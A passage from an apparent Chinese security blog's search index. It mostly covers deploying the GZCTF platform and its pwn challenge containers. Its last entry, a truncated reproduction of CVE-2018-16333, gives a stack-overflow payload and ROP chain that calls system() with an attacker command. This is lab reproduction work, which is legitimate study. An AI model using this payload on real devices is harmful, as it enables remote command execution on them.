class="hljs-regexp">//</span> 邮箱密码,部分服务商需要填入授权码<br> <span class="hljs-string">"Smtp"</span>: {<br> <span class="hljs-string">"Host"</span>: <span class="hljs-string">"smtp.163.com"</span>, <span class="hljs-regexp">//</span> 此处为<span class="hljs-number">163</span>邮箱服务器,具体自定<br> <span class="hljs-string">"Port"</span>: <span class="hljs-number">465</span><br> }<br> },<br> <span class="hljs-string">"XorKey"</span>: <span class="hljs-string">"<String2>"</span>, <span class="hljs-regexp">//</span> 自定XorKey<br> <span class="hljs-string">"ContainerProvider"</span>: {<br> <span class="hljs-string">"Type"</span>: <span class="hljs-string">"Docker"</span>,<br> <span class="hljs-string">"PublicEntry"</span>: <span class="hljs-string">"xx.xx.xx.xx"</span>, <span class="hljs-regexp">//</span> 域名或IP配置,用于容器生成,域名不带http/https<br> <span class="hljs-string">"DockerConfig"</span>: {<br> <span class="hljs-string">"SwarmMode"</span>: false,<br> <span class="hljs-string">"Uri"</span>: <span class="hljs-string">""</span> <span class="hljs-regexp">//</span> 本地配置Docker因此此处置空<br> }<br> },<br> <span class="hljs-string">"RequestLogging"</span>: false,<br> <span class="hljs-string">"DisableRateLimit"</span>: false,<br> <span class="hljs-string">"RegistryConfig"</span>: {<br> <span class="hljs-string">"UserName"</span>: <span class="hljs-string">""</span>,<br> <span class="hljs-string">"Password"</span>: <span class="hljs-string">""</span>,<br> <span class="hljs-string">"ServerAddress"</span>: <span class="hljs-string">""</span><br> },<br><br> <span class="hljs-regexp">//</span>谷歌验证码配置<br> <span class="hljs-string">"GoogleRecaptcha"</span>: {<br> <span class="hljs-string">"VerifyAPIAddress"</span>: <span class="hljs-string">"https://www.recaptcha.net/recaptcha/api/siteverify"</span>,<br> <span class="hljs-string">"Sitekey"</span>: <span class="hljs-string">""</span>,<br> <span class="hljs-string">"Secretkey"</span>: <span class="hljs-string">""</span>,<br> <span class="hljs-string">"RecaptchaThreshold"</span>: <span class="hljs-string">"0.5"</span><br> }<br>}<br></code></pre></td></tr></table></figure><p>docker-compose.yml写入:</p><figure class="highlight nestedtext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><code class="hljs nestedtext"><span class="hljs-attribute">version</span><span class="hljs-punctuation">:</span> <span class="hljs-string">'3.0'</span><br><span class="hljs-attribute">services</span><span class="hljs-punctuation">:</span><br> <span class="hljs-attribute">gzctf</span><span class="hljs-punctuation">:</span><br> <span class="hljs-attribute">image</span><span class="hljs-punctuation">:</span> <span class="hljs-string">gztime/gzctf:latest</span><br> <span class="hljs-attribute">restart</span><span class="hljs-punctuation">:</span> <span class="hljs-string">always</span><br> <span class="hljs-attribute">environment</span><span class="hljs-punctuation">:</span><br> <span class="hljs-bullet">-</span> <span class="hljs-string">"GZCTF_ADMIN_PASSWORD=<String3>" # <String3>换成管理员账户密码,账号为Admin</span><br> <span class="hljs-attribute">ports</span><span class="hljs-punctuation">:</span><br> <span class="hljs-bullet">-</span> <span class="hljs-string">"80:80" # 对外端口号,前为外部端口。</span><br> <span class="hljs-attribute">networks</span><span class="hljs-punctuation">:</span><br> <span class="hljs-attribute">default</span><span class="hljs-punctuation">:</span><br> <span class="hljs-attribute">volumes</span><span class="hljs-punctuation">:</span><br> <span class="hljs-bullet">-</span> <span class="hljs-string">"./data/files:/app/uploads"</span><br> <span class="hljs-bullet">-</span> <span class="hljs-string">"./appsettings.json:/app/appsettings.json:ro"</span><br> <span class="hljs-bullet">-</span> <span class="hljs-string">"./logs:/app/log"</span><br> <span class="hljs-bullet">-</span> <span class="hljs-string">"./data/keys:/root/.aspnet/DataProtection-Keys"</span><br> <span class="hljs-comment"># - "./k8sconfig.yaml:/app/k8sconfig.yaml:ro"</span><br> <span class="hljs-bullet">-</span> <span class="hljs-string">"/var/run/docker.sock:/var/run/docker.sock"</span><br> <span class="hljs-attribute">depends_on</span><span class="hljs-punctuation">:</span><br> <span class="hljs-bullet">-</span> <span class="hljs-string">db</span><br><br> <span class="hljs-attribute">db</span><span class="hljs-punctuation">:</span><br> <span class="hljs-attribute">image</span><span class="hljs-punctuation">:</span> <span class="hljs-string">postgres:alpine</span><br> <span class="hljs-attribute">restart</span><span class="hljs-punctuation">:</span> <span class="hljs-string">always</span><br> <span class="hljs-attribute">environment</span><span class="hljs-punctuation">:</span><br> <span class="hljs-bullet">-</span> <span class="hljs-string">"POSTGRES_PASSWORD=<String1>" # 数据库密码,务必要和appsettings.json中的配置一致</span><br> <span class="hljs-attribute">networks</span><span class="hljs-punctuation">:</span><br> <span class="hljs-attribute">default</span><span class="hljs-punctuation">:</span><br> <span class="hljs-attribute">volumes</span><span class="hljs-punctuation">:</span><br> <span class="hljs-bullet">-</span> <span class="hljs-string">"./data/db:/var/lib/postgresql/data"</span><br><br><span class="hljs-attribute">networks</span><span class="hljs-punctuation">:</span><br> <span class="hljs-attribute">default</span><span class="hljs-punctuation">:</span><br> <span class="hljs-attribute">driver</span><span class="hljs-punctuation">:</span> <span class="hljs-string">bridge</span><br> <span class="hljs-attribute">ipam</span><span class="hljs-punctuation">:</span><br> <span class="hljs-attribute">config</span><span class="hljs-punctuation">:</span><br> <span class="hljs-bullet">-</span> <span class="hljs-string">subnet: 192.168.12.0/24</span><br></code></pre></td></tr></table></figure><p>通过ssh连接服务器,将文件夹上传。开始部署</p><figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs vim"><span class="hljs-keyword">cd</span> GZCTF<br>docker-compose <span class="hljs-keyword">up</span> -d<br></code></pre></td></tr></table></figure><p>部署完成后,建议查看Logs,看部署是否成功。主要是看gzctf容器是否连接上了数据库。</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251331972.png" alt="Untitled"></p><p>这里连接失败貌似不影响靶场使用,反正我正常测试了几个功能都没什么影响 ### pwn题部署 这里使用Admin登录创建一个比赛,然后创建赛题,会发现pwn题这里动态容器部署需要使用dockerhub来上传pwn的docker</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251331962.png" alt="image.png"></p><p>将docker上传dockerhub首先得去注册一个dockerhub的账号,然后创建好一个仓库之后记住用户名和仓库的名字,在虚拟机上登录dockerhub</p><figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs nginx"><span class="hljs-attribute">sudo</span> docker login -u 用户名<br></code></pre></td></tr></table></figure><p>然后就是制作自己pwn题的docker镜像 首先得有一个pwn题的板子 <a href="https://xjcve.yuque.com/attachments/yuque/0/2023/zip/26443359/1685893120948-8f6bf7e0-21db-472a-aa9f-a4c7c8b6cfc8.zip?_lake_card=%7B%22src%22:%22https://xjcve.yuque.com/attachments/yuque/0/2023/zip/26443359/1685893120948-8f6bf7e0-21db-472a-aa9f-a4c7c8b6cfc8.zip%22,%22name%22:%22docker.zip%22,%22size%22:5282,%22ext%22:%22zip%22,%22source%22:%22%22,%22status%22:%22done%22,%22download%22:true,%22taskId%22:%22u1bf64474-40ad-4c9f-bf97-207f0222a78%22,%22taskType%22:%22upload%22,%22type%22:%22application/x-zip-compressed%22,%22__spacing%22:%22both%22,%22id%22:%22u4182cfb9%22,%22margin%22:%7B%22top%22:true,%22bottom%22:true%7D,%22card%22:%22file%22%7D">docker.zip</a> 记得将里面的run.sh改一下,这里已经改过了,直接将环境变量GZCTF_FLAG,echo给flag和flag.txt就可以了,然后build一下,build之后再讲他改下名字和tag</p><figure class="highlight crmsh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs crmsh">sudo docker build -t <span class="hljs-string">"pwn"</span> ./<br>sudo docker <span class="hljs-keyword">tag</span> <span class="hljs-title">pwn</span>:latest youlinyo/youlin:pwn <span class="hljs-comment">#这里youlinyo是用户名,youlin是仓库名</span><br></code></pre></td></tr></table></figure><p>接着将这个镜像push到dockerhub上面去就可以了</p><figure class="highlight arcade"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs arcade">sudo docker <span class="hljs-built_in">push</span> youlinyo/youlin:pwn<br></code></pre></td></tr></table></figure><p>然后就可以直接在靶场里面测试这个靶机了,在比赛的时候也可以直接创建动态容器(别忘记可以去设置flag格式和上传题目附件,这里会把flag直接给环境变量GZCTF_FLAG)</p>]]></content>
</entry>
<entry>
<title>CVE-2018-16333复现</title>
<link href="/2023/09/25/CVE-2018-16333%E5%A4%8D%E7%8E%B0/"/>
<url>/2023/09/25/CVE-2018-16333%E5%A4%8D%E7%8E%B0/</url>
<content type="html"><</p><p>所以构造exp:</p><p>payload = b’a’(0x60) + p32(readable_addr) + b’b’(0x20-8)</p><p>payload+= p32(pop_r3) + p32(system) + p32(mov_r0_ret_r3) + cmd</p><p>在返回地址处打断点 b *0x00067758,可以看到栈上返回地址已经被劫持成我们构造的ROP链。</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251322220.png" alt="Untitled"></p><p>运行成功截图:</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251322631.png" alt="Untitled"></p>]]></content>
</entry>
</search>